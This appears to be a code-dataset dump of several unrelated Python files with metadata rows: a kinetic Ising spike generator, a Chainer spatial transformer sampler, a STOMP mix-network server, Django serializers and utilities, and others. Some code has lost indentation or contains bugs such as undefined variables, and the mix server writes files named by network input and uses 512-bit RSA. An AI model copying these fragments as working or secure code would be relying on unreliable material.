Probabilities that at time point t+1 neuron n fires
"""
# compute fields
H = compute_fields(S, J)
# If a string was passed as the energy function use the function that is mapped to it
string_to_func = {'exp_cosh': exp_cosh, 'gaussian': gaussian, 'logistic': expit}
if energy_function in string_to_func.keys():
energy_function = string_to_func[energy_function]
# compute probabilities
p = energy_function(H)
# return
return p
def compute_fields(S, J):
""" Computes the fields for given data and couplings
:param S: numpy.ndarray (T,N)
Binary data where an entry is either 1 ('spike') or -1 ('silence').
:param J: numpy.ndarray (N, N)
Coupling matrix.
:return: numpy.ndarray (T,N)
Fields at time point t+1 on neuron n
"""
# compute
H = np.dot(S, J)
return H
def spike_and_slab(ro, N, bias, v_s=1.0, bias_mean=0):
    ''' This function generates spike-and-slab priors
    :param ro: sparsity
    :param N: number of neurons
    :param bias: 1 if bias is included in the model, 0 otherwise
    :param v_s: standard deviation of the slab (normal) component
    :param bias_mean: mean of the slab component for the bias row
    :return: (N + bias, N) array of couplings drawn from the spike-and-slab prior
'''
gamma = stats.bernoulli.rvs(p=ro, size=(N + bias, N))
normal_dist = np.random.normal(0.0, v_s, (N + bias, N))
if bias:
gamma[N, :] = 1
normal_dist[N, :] = np.random.normal(bias_mean, v_s, N)
return gamma * normal_dist
def generate_spikes(N, T, S0, J, energy_function, bias, no_spike=-1):
""" Generates spike data according to kinetic Ising model
:param J: numpy.ndarray (N, N)
Coupling matrix.
:param T: int
Length of trajectory that is generated.
:param S0: numpy.ndarray (N)
        Initial pattern that sampling is started from.
    :param bias: 1 if bias is included in the model. 0 otherwise.
:param no_spike: what number should represent 'no_spike'. Default is -1.
:return: numpy.ndarray (T, N)
Binary data where an entry is either 1 ('spike') or -1 ('silence'). First row is only ones for external fields.
"""
# Initialize array for data
S = np.empty([T, N + bias])
# Set initial spike pattern
S[0] = S0 if no_spike == -1 else np.zeros(N + bias)
# Last column in the activity matrix is of the bias and should be 1 at all times
if bias:
S[:, N] = 1
# Generate random numbers
X = np.random.rand(T - 1, N)
#X = np.random.normal(size=(T-1, N))
# Iterate through all time points
for i in range(1, T):
# Compute probabilities of neuron firing
p = kinetic_ising_model(np.array([S[i - 1]]), J, energy_function)
if energy_function == 'gaussian':
S[i, :N] = p
else:
# Check if spike or not
if no_spike == -1:
S[i, :N] = 2 * (X[i - 1] < p) - 1
else:
S[i, :N] = 2 * (X[i - 1] < p) / 2.0
return S
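# Illustrative usage sketch (added by the editor; not part of the original module).
# Parameter values are arbitrary assumptions chosen only to show the expected shapes.
if __name__ == '__main__':
    N, T, bias = 10, 1000, 1
    J = spike_and_slab(ro=0.3, N=N, bias=bias)           # (N + bias, N) couplings
    S0 = np.ones(N + bias)                               # initial spike pattern
    S = generate_spikes(N, T, S0, J, 'logistic', bias)   # (T, N + bias) activity
    print(S.shape)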
| mit | -7,903,146,007,753,143,000 | 28.583333 | 119 | 0.599718 | false |
geopython/QGIS | python/PyQt/PyQt5/QtSvg.py | 17 | 1129 | # -*- coding: utf-8 -*-
"""
***************************************************************************
QtSvg.py
---------------------
Date : March 2016
Copyright : (C) 2016 by Juergen E. Fischer
Email : jef at norbit dot de
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Juergen E. Fischer'
__date__ = 'March 2016'
__copyright__ = '(C) 2016, Juergen E. Fischer'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from PyQt5.QtSvg import *
| gpl-2.0 | -65,583,323,552,826,400 | 42.423077 | 75 | 0.374668 | false |
rezoo/chainer | chainer/functions/array/spatial_transformer_sampler.py | 3 | 11318 | import numpy
import chainer
from chainer.backends import cuda
from chainer import function
from chainer.utils import argument
from chainer.utils import type_check
if cuda.cudnn_enabled:
cudnn = cuda.cudnn
libcudnn = cuda.cuda.cudnn
_sampler_type = libcudnn.CUDNN_SAMPLER_BILINEAR
class SpatialTransformerSampler(function.Function):
def check_type_forward(self, in_types):
n_in = in_types.size()
type_check.expect(2 == n_in)
x_type = in_types[0]
grid_type = in_types[1]
type_check.expect(
x_type.dtype.char == 'f',
grid_type.dtype.char == 'f',
x_type.ndim == 4,
grid_type.ndim == 4,
grid_type.shape[1] == 2,
x_type.shape[0] == grid_type.shape[0],
)
def forward_cpu(self, inputs):
return self._forward(inputs)
def forward_gpu(self, inputs):
if not chainer.should_use_cudnn('>=auto', 5000):
return self._forward(inputs)
x, grid = inputs
out_shape = x.shape[:2] + grid.shape[2:]
y = cuda.cupy.empty(out_shape, dtype=x.dtype)
shape = numpy.array(out_shape, dtype=numpy.int32)
x = cuda.cupy.ascontiguousarray(x)
grid_t = cuda.cupy.transpose(grid, (0, 2, 3, 1))
grid_t = cuda.cupy.ascontiguousarray(grid_t)
handle = cudnn.get_handle()
x_desc = cudnn.create_tensor_descriptor(x)
y_desc = cudnn.create_tensor_descriptor(y)
self.st_desc =\
cuda.cupy.cudnn.create_spatial_transformer_descriptor(
_sampler_type, grid.dtype, len(shape), shape.ctypes.data)
one = numpy.array(1, dtype=x.dtype).ctypes
zero = numpy.array(0, dtype=x.dtype).ctypes
libcudnn.spatialTfSamplerForward(
handle, self.st_desc.value, one.data,
x_desc.value, x.data.ptr, grid_t.data.ptr, zero.data,
y_desc.value, y.data.ptr)
return y,
def _forward(self, inputs):
x, grid = inputs
xp = cuda.get_array_module(x)
B, C, H, W = x.shape
_, _, out_H, out_W = grid.shape
grid = grid.reshape(grid.shape[:2] + (-1,))
u = grid[:, 0]
v = grid[:, 1]
        # Pad the image so that pixels located outside of the original
        # image can be sampled.
x_pad = xp.pad(x, ((0, 0), (0, 0), (1, 1), (1, 1)), mode='constant')
# Rescale coordinates from [-1, 1] to [0, width or height - 1],
# and adjust them to the padded image.
u = (u + 1) * (W - 1) / 2 + 1
v = (v + 1) * (H - 1) / 2 + 1
u_clipped = u.clip(0, W + 1)
v_clipped = v.clip(0, H + 1)
# indices of the 2x2 pixel neighborhood surrounding the coordinates
u0 = xp.floor(u_clipped).astype(numpy.int32)
u0 = u0.clip(0, W)
u1 = u0 + 1
v0 = xp.floor(v_clipped).astype(numpy.int32)
v0 = v0.clip(0, H)
v1 = v0 + 1
# weights
w1 = (u1 - u_clipped) * (v1 - v_clipped)
w2 = (u_clipped - u0) * (v1 - v_clipped)
w3 = (u1 - u_clipped) * (v_clipped - v0)
w4 = (u_clipped - u0) * (v_clipped - v0)
w1 = w1.astype(x_pad.dtype)
w2 = w2.astype(x_pad.dtype)
w3 = w3.astype(x_pad.dtype)
w4 = w4.astype(x_pad.dtype)
x_indexed_1 = xp.concatenate([xp.expand_dims(
x_pad[b, :, v0[b], u0[b]], axis=0) for b in range(B)], axis=0)
x_indexed_2 = xp.concatenate([xp.expand_dims(
x_pad[b, :, v0[b], u1[b]], axis=0) for b in range(B)], axis=0)
x_indexed_3 = xp.concatenate([xp.expand_dims(
x_pad[b, :, v1[b], u0[b]], axis=0) for b in range(B)], axis=0)
x_indexed_4 = xp.concatenate([xp.expand_dims(
x_pad[b, :, v1[b], u1[b]], axis=0) for b in range(B)], axis=0)
y = w1[:, :, None] * x_indexed_1
y += w2[:, :, None] * x_indexed_2
y += w3[:, :, None] * x_indexed_3
y += w4[:, :, None] * x_indexed_4
y = y.reshape(B, out_H, out_W, C).transpose(0, 3, 1, 2)
return y,
def backward_cpu(self, inputs, grad_outputs):
return self._backward(inputs, grad_outputs)
def backward_gpu(self, inputs, grad_outputs):
if not chainer.should_use_cudnn('>=auto', 5000):
return self._backward(inputs, grad_outputs)
x, grid = inputs
gy, = grad_outputs
grid_t = cuda.cupy.transpose(grid, (0, 2, 3, 1))
grid_t = cuda.cupy.ascontiguousarray(grid_t)
x = cuda.cupy.ascontiguousarray(x)
gy = cuda.cupy.ascontiguousarray(gy)
gx = cuda.cupy.empty_like(x)
ggrid_t = cuda.cupy.empty_like(grid_t)
handle = cudnn.get_handle()
x_desc = cudnn.create_tensor_descriptor(x)
dx_desc = cudnn.create_tensor_descriptor(gx)
dy_desc = cudnn.create_tensor_descriptor(gy)
one = numpy.array(1, dtype=x.dtype).ctypes
zero = numpy.array(0, dtype=x.dtype).ctypes
libcudnn.spatialTfSamplerBackward(
handle, self.st_desc.value,
one.data,
x_desc.value, x.data.ptr,
zero.data,
dx_desc.value, gx.data.ptr,
one.data,
dy_desc.value, gy.data.ptr,
grid_t.data.ptr, zero.data, ggrid_t.data.ptr)
ggrid = cuda.cupy.transpose(ggrid_t, axes=(0, 3, 1, 2))
return gx, ggrid
def _backward(self, inputs, grad_outputs):
x, grid = inputs
xp = cuda.get_array_module(x)
gy, = grad_outputs
B, C, H, W = x.shape
_, _, out_H, out_W = grid.shape
grid = grid.reshape(grid.shape[:2] + (-1,))
u = grid[:, 0]
v = grid[:, 1]
        # Pad the image so that points located outside of the original
        # image can be sampled.
x_pad = xp.pad(x, ((0, 0), (0, 0), (1, 1), (1, 1)), mode='constant')
# Rescale coordinates from [-1, 1] to [0, width or height - 1],
# and adjust them to the padded image.
u = (u + 1) * (W - 1) / 2 + 1
v = (v + 1) * (H - 1) / 2 + 1
u_clipped = u.clip(0, W + 1)
v_clipped = v.clip(0, H + 1)
# indices of the 2x2 pixel neighborhood surrounding the coordinates
u0 = xp.floor(u_clipped).astype(numpy.int32)
u0 = u0.clip(0, W)
u1 = u0 + 1
v0 = xp.floor(v_clipped).astype(numpy.int32)
v0 = v0.clip(0, H)
v1 = v0 + 1
# weights
wu0 = u_clipped - u0
wu1 = u1 - u_clipped
wv0 = v_clipped - v0
wv1 = v1 - v_clipped
wu0 = wu0.astype(gy.dtype)
wu1 = wu1.astype(gy.dtype)
wv0 = wv0.astype(gy.dtype)
wv1 = wv1.astype(gy.dtype)
# --- gu, gv
x_indexed_1 = xp.concatenate([xp.expand_dims(
x_pad[b, :, v0[b], u0[b]], axis=0) for b in range(B)], axis=0)
x_indexed_2 = xp.concatenate([xp.expand_dims(
x_pad[b, :, v0[b], u1[b]], axis=0) for b in range(B)], axis=0)
x_indexed_3 = xp.concatenate([xp.expand_dims(
x_pad[b, :, v1[b], u0[b]], axis=0) for b in range(B)], axis=0)
x_indexed_4 = xp.concatenate([xp.expand_dims(
x_pad[b, :, v1[b], u1[b]], axis=0) for b in range(B)], axis=0)
gu = -wv1[:, :, None] * x_indexed_1
gu += wv1[:, :, None] * x_indexed_2
gu -= wv0[:, :, None] * x_indexed_3
gu += wv0[:, :, None] * x_indexed_4
gv = -wu1[:, :, None] * x_indexed_1
gv -= wu0[:, :, None] * x_indexed_2
gv += wu1[:, :, None] * x_indexed_3
gv += wu0[:, :, None] * x_indexed_4
gu = gu.reshape(B, out_H, out_W, C).transpose(0, 3, 1, 2)
gv = gv.reshape(B, out_H, out_W, C).transpose(0, 3, 1, 2)
gu *= gy
gv *= gy
gu = xp.sum(gu, axis=1)
gv = xp.sum(gv, axis=1)
# Offsets scaling of the coordinates and clip gradients.
u_reshaped = u.reshape(gu.shape)
v_reshaped = v.reshape(gv.shape)
gu = gu / 2. * (W - 1) * (u_reshaped > 0) * (u_reshaped < (W + 1))
gv = gv / 2. * (H - 1) * (v_reshaped > 0) * (v_reshaped < (H + 1))
ggrid = xp.concatenate((gu[:, None], gv[:, None]), axis=1)
# --- gx
if xp is numpy:
scatter_add = numpy.add.at
else:
scatter_add = cuda.cupyx.scatter_add
gx = xp.zeros_like(x_pad)
gy = gy.reshape(B, C, -1)
for b in range(B):
scatter_add(gx[b], (slice(None), v0[b], u0[b]),
gy[b] * wu1[b] * wv1[b])
scatter_add(gx[b], (slice(None), v0[b], u1[b]),
gy[b] * wu0[b] * wv1[b])
scatter_add(gx[b], (slice(None), v1[b], u0[b]),
gy[b] * wu1[b] * wv0[b])
scatter_add(gx[b], (slice(None), v1[b], u1[b]),
gy[b] * wu0[b] * wv0[b])
gx = gx[:, :, 1:-1, 1:-1]
return gx, ggrid
def spatial_transformer_sampler(x, grid, **kwargs):
"""2D Spatial Transformer sampler.
This is a differentiable image sampler. With a set of sampling points
``grid`` and an input feature map ``x``, this produces a sampled output
feature map.
This function currently only supports bilinear interpolation as a sampling
kernel.
    When coordinates in ``grid`` are outside the range :math:`[-1, 1]`, values are
sampled from a zero padded input image.
    Notation: here is the notation for dimensionalities.
- :math:`n` is the batch size.
- :math:`c_I` is the number of the input channels.
- :math:`h` and :math:`w` are the height and width of the input image,
respectively.
- :math:`h_O` and :math:`w_O` are the height and width of the output
image.
See detail in the following paper: `Spatial Transformer Networks \
<https://arxiv.org/abs/1506.02025>`_.
.. note::
cuDNN supports SpatialTransformerSampler from version 5.0.0.
Args:
x (~chainer.Variable): Input variable of shape :math:`(n, c_I, h, w)`.
grid (~chainer.Variable): Coordinate variable of shape
:math:`(n, 2, h_O, w_O)`. Each coordinate defines the spatial
location in the input where a sampling kernel is applied to get
the value at a particular pixel in the output.
``grid[idx, :, i, j]`` corresponds to the coordinate that is used
to sample the values for an output pixel at location
:math:`(i, j)`.
In the second dimension, the first coordinate corresponds to the
location along the horizontal axis, and the second coordinate
corresponds to the location along the vertical axis.
The coordinate :math:`(-1, -1)` corresponds to the upper-left
corner of the input image.
Returns:
~chainer.Variable: Output feature map of shape \
:math:`(n, c_I, h_O, w_O)`.
"""
if kwargs:
argument.check_unexpected_kwargs(
kwargs, use_cudnn="The argument \"use_cudnn\" is not "
"supported anymore. "
"Use chainer.using_config('use_cudnn', value) "
"context where value can be `always`, `never`, or `auto`.")
argument.assert_kwargs_empty(kwargs)
return SpatialTransformerSampler()(x, grid)
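# Illustrative usage sketch (added by the editor; not part of the original module).
# It builds an "identity" sampling grid in [-1, 1] x [-1, 1]; with that grid the
# sampler should roughly reproduce the input. Shapes and values are assumptions.
if __name__ == '__main__':
    n, c, h, w = 1, 3, 8, 8
    x = numpy.random.rand(n, c, h, w).astype(numpy.float32)
    # grid[:, 0] holds the horizontal coordinate, grid[:, 1] the vertical one,
    # both in [-1, 1] (see the docstring of spatial_transformer_sampler above).
    us, vs = numpy.meshgrid(numpy.linspace(-1, 1, w), numpy.linspace(-1, 1, h))
    grid = numpy.stack([us, vs])[None].astype(numpy.float32)  # shape (1, 2, h, w)
    y = spatial_transformer_sampler(x, grid)
    print(y.shape)  # (1, 3, 8, 8)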
| mit | -4,569,858,674,480,813,000 | 35.509677 | 79 | 0.54029 | false |
sigttou/SMMpy | src/server.py | 1 | 4225 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
__author__ = "David Bidner, Rene Höbling and Alexander Wachter"
__license__ = "BSD 2-Clause"
__version__ = "1.0.0"
__status__ = "Released"
# Provides a more or less complex structure for the SMM Network server
import rsa
import os.path
import time
import stomp
import json
import base64
import random
import sys
from SimpleAES import SimpleAES
from settings import STOMP_PORT, MAX_QUEUE_SIZE, QUEUE, KEY_PATH
class MixListener(object):
def __init__(self, privkey=None):
if not privkey:
print("No PrivateKey")
            sys.exit()
self.privkey = privkey
self.to_send = []
def on_error(self, headers, message):
print('received an error %s' % message)
def on_message(self, headers, message):
message = json.loads(message)
# Tracker things:
if(message.get('TYPE') == "INFO"):
data = message['DATA']
for entry in data:
with open(KEY_PATH + entry, 'w') as storage:
storage.write(data[entry])
return
if(message.get('TYPE') == "REQ"):
info = {}
response = {}
response['TYPE'] = "INFO"
for entry in os.listdir(KEY_PATH):
with open(KEY_PATH + entry, 'r') as content:
info[entry] = content.read()
response['DATA'] = info
response = json.dumps(response)
address = message['FROM'].split(":")[0]
port = STOMP_PORT
if len(message['FROM'].split(":")) == 2:
port = message['FROM'].split(":")[1]
try:
conn = stomp.StompConnection10([(address, port)])
conn.start()
conn.connect()
conn.send(body=response, destination=QUEUE)
                conn.disconnect()
except:
print("REMOTE HOST NOT AVAILABLE")
return
# Any other message
crypted_key = base64.b64decode(message['KEY'])
aes_key = rsa.decrypt(crypted_key, self.privkey)
aes = SimpleAES(aes_key)
data = aes.decrypt(base64.b64decode(message['DATA']))
if message['TO'] == '':
print(message['FROM'] + ': ' + data)
else:
print('Relaying message to: %s' % message['TO'])
self.to_send.append((data, message['TO']))
if len(self.to_send) > MAX_QUEUE_SIZE:
random.shuffle(self.to_send)
for data in self.to_send:
address = data[1].split(":")[0]
port = STOMP_PORT
if len(data[1].split(":")) == 2:
port = data[1].split(":")[1]
try:
conn = stomp.StompConnection10([(address, port)])
conn.start()
conn.connect()
conn.send(body=data[0], destination=QUEUE)
                    conn.disconnect()
except:
print("REMOTE HOST NOT AVAILABLE")
self.to_send = []
def main():
# Do we have our OWN Keys?
if not (os.path.isfile('./privkey.pem') and os.path.isfile('./pubkey.pem')):
(pubkey, privkey) = rsa.newkeys(512)
with open("privkey.pem", 'w') as keyfile:
keyfile.write(privkey.save_pkcs1())
with open("pubkey.pem", 'w') as keyfile:
keyfile.write(pubkey.save_pkcs1())
else:
with open("privkey.pem") as keyfile:
keydata = keyfile.read()
privkey = rsa.PrivateKey.load_pkcs1(keydata)
with open("pubkey.pem") as keyfile:
keydata = keyfile.read()
pubkey = rsa.PublicKey.load_pkcs1(keydata)
# After this, we can use pubkey and privkey as our keypair for encryption
# Connect to stomp and fetch messages
conn = stomp.StompConnection10()
conn.set_listener('', MixListener(privkey))
conn.start()
conn.connect()
conn.subscribe(destination=QUEUE, id=1, ack='auto')
# Yes we do this :-)
while (True):
time.sleep(10)
if __name__ == "__main__":
main()
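# Illustrative client-side sketch (added by the editor; not part of the original
# server). It shows how a message that MixListener.on_message() can decrypt might be
# assembled: the payload is AES-encrypted and the AES key is RSA-encrypted for the
# recipient. Field names mirror on_message(); the key string, addresses and helper
# name are assumptions.
def build_message_example(text, recipient_pubkey, sender_addr, next_hop=''):
    aes_key = 'an example passphrase'  # assumed shared key string for SimpleAES
    data = base64.b64encode(SimpleAES(aes_key).encrypt(text))
    key = base64.b64encode(rsa.encrypt(aes_key, recipient_pubkey))
    return json.dumps({'FROM': sender_addr, 'TO': next_hop,
                       'KEY': key, 'DATA': data})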
| bsd-2-clause | 7,359,604,263,949,605,000 | 31 | 80 | 0.523674 | false |
allena29/pi-learning | 02-operation-nee-naw/script.py | 1 | 1062 | #!/usr/bin/python
import sys
import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BOARD)
# Setup Stuff
sys.stderr.write('\033[1;31mnee\033[1;34mnaw script')
GPIO.setup(27, GPIO.OUT)
GPIO.setup(22, GPIO.OUT)
# HOW
def turn_a_light_on_or_off(light, on):
if light == 'red':
gpio_pin_number = 27
sound = '\033[1;31mnee'
elif light == 'blue':
gpio_pin_number = 22
sound = '\033[1;34mnawitsthepolice'
else:
raise ValueError('no such light colour plugged in')
sys.stderr.write('%s ' % (sound))
GPIO.output(gpio_pin_number, on)
# WHAT
#
# The scenario we are trying to acheive
# (i.e. police chase, granny being chased by lambourghini)
#
try:
while 1:
turn_a_light_on_or_off('red', True)
turn_a_light_on_or_off('blue', False)
time.sleep(0.125)
turn_a_light_on_or_off('red', False)
turn_a_light_on_or_off('blue', True)
time.sleep(0.125)
except KeyboardInterrupt:
GPIO.output(22, 0)
GPIO.output(27, 0)
# CLEANUP
sys.stderr.write('\n')
| gpl-3.0 | -7,835,198,423,294,629,000 | 18.309091 | 59 | 0.617702 | false |
rishatsharafiev/crm | project/api/serializers.py | 1 | 8981 | # -*- coding: utf-8 -*-
from rest_framework import serializers
from rest_framework import exceptions
from rest_framework.validators import ValidationError, UniqueValidator
from django.contrib.auth.models import User
from .models import (
Employee,
Subdivision,
Project,
Task,
Comment,
# TaskPicture,
# CommentPicture
)
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
exclude = ('is_staff','is_superuser','is_active','groups','user_permissions')
extra_kwargs = {
'password': {
'required': False,
'write_only': True
},
'username': {
'validators': []
}
}
def restore_object(self, attrs, instance=None):
user = super(UserSerializer, self).restore_object(attrs, instance)
user.set_password(attrs['password'])
return user
class EmployeeChildField(serializers.RelatedField):
def to_representation(self, value):
return value.title
class EmployeeSerializer(serializers.ModelSerializer):
link = serializers.HyperlinkedIdentityField(view_name='employee-detail')
user = UserSerializer()
subdivision_name = EmployeeChildField(
source='subdivision', read_only=True, required=False
)
put_method_allowed = serializers.SerializerMethodField()
delete_method_allowed = serializers.SerializerMethodField()
def get_put_method_allowed(self, obj):
user = self.context['request'].user
authenticated = user.is_authenticated()
staff = authenticated and user.is_staff
owner = authenticated and (obj.user == user)
return staff or owner
def get_delete_method_allowed(self, obj):
user = self.context['request'].user
authenticated = user.is_authenticated()
staff = authenticated and user.is_staff
return staff
class Meta:
model = Employee
fields = (
"id",
'user',
'link',
'subdivision',
'subdivision_name',
'put_method_allowed',
'delete_method_allowed'
)
related_obj_name = 'user'
def create(self, validated_data):
user_data = validated_data.pop('user')
user = User.objects.create(**user_data)
user.set_password( user_data.get('password') )
user.save()
employee = Employee.objects.create(user=user, **validated_data)
return employee
def update(self, instance, validated_data):
related_obj_name = self.Meta.related_obj_name
data = validated_data.pop(related_obj_name)
related_instance = getattr(instance, related_obj_name)
for attr_name, value in data.items():
if attr_name == 'password':
related_instance.set_password(value)
else:
setattr(related_instance, attr_name, value)
related_instance.save()
return super(EmployeeSerializer,self).update(instance, validated_data)
class SubdivisionChildField(serializers.RelatedField):
def to_representation(self, value):
return value.username
class SubdivisionSerializer(serializers.ModelSerializer):
link = serializers.HyperlinkedIdentityField(view_name='subdivision-detail')
manager_name = SubdivisionChildField(
source='manager', read_only=True, required=False
)
put_method_allowed = serializers.SerializerMethodField()
delete_method_allowed = serializers.SerializerMethodField()
def get_put_method_allowed(self, obj):
user = self.context['request'].user
authenticated = user.is_authenticated()
staff = authenticated and user.is_staff
owner = authenticated and (obj.manager == user)
return staff or owner
def get_delete_method_allowed(self, obj):
user = self.context['request'].user
authenticated = user.is_authenticated()
staff = authenticated and user.is_staff
return staff
class Meta:
model = Subdivision
fields = (
'id',
'link',
'title',
'description',
'manager',
'manager_name',
'put_method_allowed',
'delete_method_allowed'
)
class ProjectChildField(serializers.RelatedField):
def to_representation(self, value):
return value.username
class ProjectSerializer(serializers.ModelSerializer):
link = serializers.HyperlinkedIdentityField(view_name='project-detail')
owner = serializers.PrimaryKeyRelatedField(read_only=True, required=False)
owner_name = ProjectChildField(
source='owner', read_only=True, required=False
)
task_count = serializers.SerializerMethodField()
def get_task_count(self, obj):
return obj.task_set.count()
put_method_allowed = serializers.SerializerMethodField()
delete_method_allowed = serializers.SerializerMethodField()
def get_put_method_allowed(self, obj):
user = self.context['request'].user
authenticated = user.is_authenticated()
staff = authenticated and user.is_staff
owner = authenticated and (obj.owner == user)
return staff or owner
def get_delete_method_allowed(self, obj):
user = self.context['request'].user
authenticated = user.is_authenticated()
staff = authenticated and user.is_staff
owner = authenticated and (obj.owner == user)
return staff or owner
class Meta:
model = Project
fields = (
'id',
'link',
'title',
'description',
'created_date',
'owner',
'owner_name',
'task_count',
'put_method_allowed',
'delete_method_allowed'
)
class TaskParentSerializer(serializers.ModelSerializer):
link = serializers.HyperlinkedIdentityField(view_name='task-detail')
class Meta:
model = Task
fields =( 'id','title', 'link',)
class EmployeeChildField(serializers.RelatedField):
def to_representation(self, value):
return value.username
class TaskSerializer(serializers.ModelSerializer):
owner = serializers.PrimaryKeyRelatedField(read_only=True, required=False)
base_task = serializers.PrimaryKeyRelatedField(queryset=Task.objects.all(), required=False, allow_null=True)
project_name = serializers.CharField(
source='project', read_only=True, required=False
)
owner_name = EmployeeChildField(
source='owner', read_only=True,required=False
)
responsible_name = EmployeeChildField(
source='responsible', read_only=True,required=False
)
base_task_name = serializers.CharField(
source='base_task', read_only=True, required=False
)
status_type = serializers.SerializerMethodField()
put_method_allowed = serializers.SerializerMethodField()
delete_method_allowed = serializers.SerializerMethodField()
def get_put_method_allowed(self, obj):
user = self.context['request'].user
authenticated = user.is_authenticated()
staff = authenticated and user.is_staff
owner = authenticated and (obj.owner == user)
responsible = authenticated and (obj.responsible == user)
return staff or owner or responsible
def get_delete_method_allowed(self, obj):
user = self.context['request'].user
authenticated = user.is_authenticated()
staff = authenticated and user.is_staff
owner = authenticated and (obj.owner == user)
return staff or owner
def get_status_type(self, obj):
user = self.context['request'].user
authenticated = user.is_authenticated()
staff = authenticated and user.is_staff
owner = authenticated and (obj.owner == user)
return staff or owner
class Meta:
model = Task
fields = (
'id',
'url',
'base_task',
'title',
'text',
'created_date',
'priority',
'status',
'project',
'owner',
'responsible',
'project_name',
'owner_name',
'responsible_name',
'base_task_name',
'put_method_allowed',
'delete_method_allowed',
'status_type'
)
class CommentSerializer(serializers.ModelSerializer):
employee = serializers.PrimaryKeyRelatedField(read_only=True, required=False)
employee_name = serializers.CharField(
source='employee', read_only=True, required=False
)
class Meta:
model = Comment
# class TaskPictureSerializer(serializers.ModelSerializer):
# class Meta:
# model = TaskPicture
# class CommentPictureSerializer(serializers.ModelSerializer):
# class Meta:
# model = CommentPicture | mit | 7,633,766,168,438,574,000 | 30.851064 | 113 | 0.627436 | false |
zniper/zeenote | simplenote/extract.py | 1 | 1830 | import requests
import logging
import json
from simplenote.settings import ALCHEMY_API_KEY, ALCHEMY_API_URL
from simplenote.settings import DIFFBOT_API_URL
logging.basicConfig()
logger = logging.getLogger(__name__)
class Extracter:
_url = ''
_text = ''
def __init__(self, url):
self._url = url
self.extractText()
def getText(self):
return self._text
def extractText(self):
pass
class AlchemyExtracter(Extracter):
def extractText(self):
""" Call API function from AlchemyAPI to extract text
"""
params = {}
params['url'] = self._url
params['apikey'] = ALCHEMY_API_KEY
params['outputMode'] = 'json'
print params
try:
            r = requests.get(ALCHEMY_API_URL + 'URLGetText', params=params)
            data = r.json()
            print data
            if data['status'] == 'OK':
                self._text = data['text']
except:
logger.error('Error when calling AlchemyAPI')
raise
class DiffBotExtracter(Extracter):
def extractText(self):
""" Call API function from AlchemyAPI to extract text
"""
params = {}
try:
print self.url
r = requests.get(DIFFBOT_API_URL + source, params=params)
print r.status_code
if r.status_code == 200:
self._text = r.json['text']
except:
logger.error('Error when working with DiffBot')
raise
def ExtractText(source):
params = {}
try:
r = requests.get(DIFFBOT_API_URL + source, params=params)
data = r.json()
if r.status_code == 200:
return data['text']
except:
logger.error('Error when working with DiffBot')
raise
| mit | -6,868,258,579,506,773,000 | 24.416667 | 81 | 0.549727 | false |
yigitguler/django | django/utils/datastructures.py | 17 | 15984 | import copy
import warnings
from collections import OrderedDict
from django.utils import six
from django.utils.deprecation import RemovedInDjango19Warning
class MergeDict(object):
"""
A simple class for creating new "virtual" dictionaries that actually look
up values in more than one dictionary, passed in the constructor.
If a key appears in more than one of the given dictionaries, only the
first occurrence will be used.
"""
def __init__(self, *dicts):
warnings.warn('`MergeDict` is deprecated, use `dict.update()` '
'instead.', RemovedInDjango19Warning, 2)
self.dicts = dicts
def __bool__(self):
return any(self.dicts)
def __nonzero__(self):
return type(self).__bool__(self)
def __getitem__(self, key):
for dict_ in self.dicts:
try:
return dict_[key]
except KeyError:
pass
raise KeyError(key)
def __copy__(self):
return self.__class__(*self.dicts)
def get(self, key, default=None):
try:
return self[key]
except KeyError:
return default
# This is used by MergeDicts of MultiValueDicts.
def getlist(self, key):
for dict_ in self.dicts:
if key in dict_:
return dict_.getlist(key)
return []
def _iteritems(self):
seen = set()
for dict_ in self.dicts:
for item in six.iteritems(dict_):
k = item[0]
if k in seen:
continue
seen.add(k)
yield item
def _iterkeys(self):
for k, v in self._iteritems():
yield k
def _itervalues(self):
for k, v in self._iteritems():
yield v
if six.PY3:
items = _iteritems
keys = _iterkeys
values = _itervalues
else:
iteritems = _iteritems
iterkeys = _iterkeys
itervalues = _itervalues
def items(self):
return list(self.iteritems())
def keys(self):
return list(self.iterkeys())
def values(self):
return list(self.itervalues())
def has_key(self, key):
for dict_ in self.dicts:
if key in dict_:
return True
return False
__contains__ = has_key
__iter__ = _iterkeys
def copy(self):
"""Returns a copy of this object."""
return self.__copy__()
def __str__(self):
'''
Returns something like
"{'key1': 'val1', 'key2': 'val2', 'key3': 'val3'}"
instead of the generic "<object meta-data>" inherited from object.
'''
return str(dict(self.items()))
def __repr__(self):
'''
Returns something like
MergeDict({'key1': 'val1', 'key2': 'val2'}, {'key3': 'val3'})
instead of generic "<object meta-data>" inherited from object.
'''
dictreprs = ', '.join(repr(d) for d in self.dicts)
return '%s(%s)' % (self.__class__.__name__, dictreprs)
class SortedDict(dict):
"""
A dictionary that keeps its keys in the order in which they're inserted.
"""
def __new__(cls, *args, **kwargs):
instance = super(SortedDict, cls).__new__(cls, *args, **kwargs)
instance.keyOrder = []
return instance
def __init__(self, data=None):
warnings.warn(
"SortedDict is deprecated and will be removed in Django 1.9.",
RemovedInDjango19Warning, stacklevel=2
)
if data is None or isinstance(data, dict):
data = data or []
super(SortedDict, self).__init__(data)
self.keyOrder = list(data) if data else []
else:
super(SortedDict, self).__init__()
super_set = super(SortedDict, self).__setitem__
for key, value in data:
# Take the ordering from first key
if key not in self:
self.keyOrder.append(key)
# But override with last value in data (dict() does this)
super_set(key, value)
def __deepcopy__(self, memo):
return self.__class__([(key, copy.deepcopy(value, memo))
for key, value in self.items()])
def __copy__(self):
# The Python's default copy implementation will alter the state
# of self. The reason for this seems complex but is likely related to
# subclassing dict.
return self.copy()
def __setitem__(self, key, value):
if key not in self:
self.keyOrder.append(key)
super(SortedDict, self).__setitem__(key, value)
def __delitem__(self, key):
super(SortedDict, self).__delitem__(key)
self.keyOrder.remove(key)
def __iter__(self):
return iter(self.keyOrder)
def __reversed__(self):
return reversed(self.keyOrder)
def pop(self, k, *args):
result = super(SortedDict, self).pop(k, *args)
try:
self.keyOrder.remove(k)
except ValueError:
# Key wasn't in the dictionary in the first place. No problem.
pass
return result
def popitem(self):
result = super(SortedDict, self).popitem()
self.keyOrder.remove(result[0])
return result
